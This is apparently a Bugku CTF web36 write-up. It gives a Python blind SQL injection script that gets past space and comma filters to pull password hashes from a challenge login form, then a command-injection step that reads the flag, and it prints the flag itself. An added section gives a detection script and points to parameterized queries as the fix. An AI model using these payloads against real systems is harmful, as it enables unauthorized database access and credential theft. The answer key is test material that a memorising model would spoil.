Bugku CTF web36(Web)

0. Open the web page and read the challenge description

Description: Does it all filter out despair?


According to the description, this is a blind SQL injection

1. Write a Python script and run it to get the password

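import requests

session = requests.Session()
url = "http://114.67.246.176:15649//login.php"
flag = ''
# Recover the value one character at a time (positions 1..249).
for i in range(1, 250):
    # Binary search over the ASCII range for the character at position i.
    left = 32
    right = 128
    mid = (left + right) // 2
    while left < right:
        # Boolean-blind payload without spaces or commas:
        # the condition is true when ascii(character i) > mid.
        payload = "admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1" % (i, mid)
        data = {'uname': payload, 'passwd': 'admin'}
        res = session.post(url, data=data)
        # 'password' in the response is treated as the "true" branch.
        if 'password' in res.text:
            left = mid + 1
        else:
            right = mid
        mid = (left + right) // 2
    # A result of 32 (comparison never true) or 127 is treated as the end of the value.
    if mid == 32 or mid == 127:
        break
    flag = flag + chr(mid)
    print(flag)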

2. Reverse the MD5 hash returned by the script

Password obtained: bugkuctf

3. Log in to the web page and run cat</flag to read the flag (spaces are filtered, so the redirection takes the place of the space)

4. Get the flag: flag{66993b2d104d9e1dd7b7d9ffc69795d7}
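
Seen from the defender's side, the script in step 1 leaves a recognisable trace: many login POSTs from one client whose uname differs only in the two integers. The following is an added example, not part of the original post, that groups form values by a number-stripped template and flags the repeats; the log entries, client addresses, function names and the threshold of 5 are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# Payload template copied from the script in step 1 (used only to build sample input).
TEMPLATE = "admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1"
# SQL function calls that have no place in a login form field.
SQL_CALL = re.compile(r"\b(ascii|ord|mid|substr|select|group_concat)\s*\(", re.I)


def constructed_log():
    """Constructed sample: (client address, raw POST body) pairs for login.php."""
    steps = [(1, 80), (1, 104), (1, 92), (1, 98), (2, 80), (2, 56), (2, 68)]
    probes = [("203.0.113.7", urlencode({"uname": TEMPLATE % s, "passwd": "admin"}))
              for s in steps]
    normal = [("198.51.100.4", urlencode({"uname": "alice", "passwd": "hunter2"})),
              ("198.51.100.4", "uname=o%27brien&passwd=x")]
    return probes + normal


def template_of(value):
    """Replace every integer so probes differing only in position/threshold collapse."""
    return re.sub(r"\d+", "N", value.lower())


def find_blind_sqli(log, min_repeats=5):
    """Return (client, field, distinct_probe_count) for repeated SQL-shaped templates."""
    seen = defaultdict(set)  # (client, field, template) -> distinct raw values
    for client, body in log:
        for field, values in parse_qs(body).items():  # parse_qs also URL-decodes
            for value in values:
                # Two or more SQL function calls in one field: candidate probe.
                if len(SQL_CALL.findall(value)) >= 2:
                    seen[(client, field, template_of(value))].add(value)
    return [(client, field, len(raws))
            for (client, field, _), raws in seen.items()
            if len(raws) >= min_repeats]


if __name__ == "__main__":
    for client, field, count in find_blind_sqli(constructed_log()):
        print(f"{client}: {count} blind-injection probes in field '{field}'")
```

Detection only narrows the window; the fix for the login itself is a parameterized query rather than a keyword filter.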


Origin blog.csdn.net/ChaoYue_miku/article/details/115016066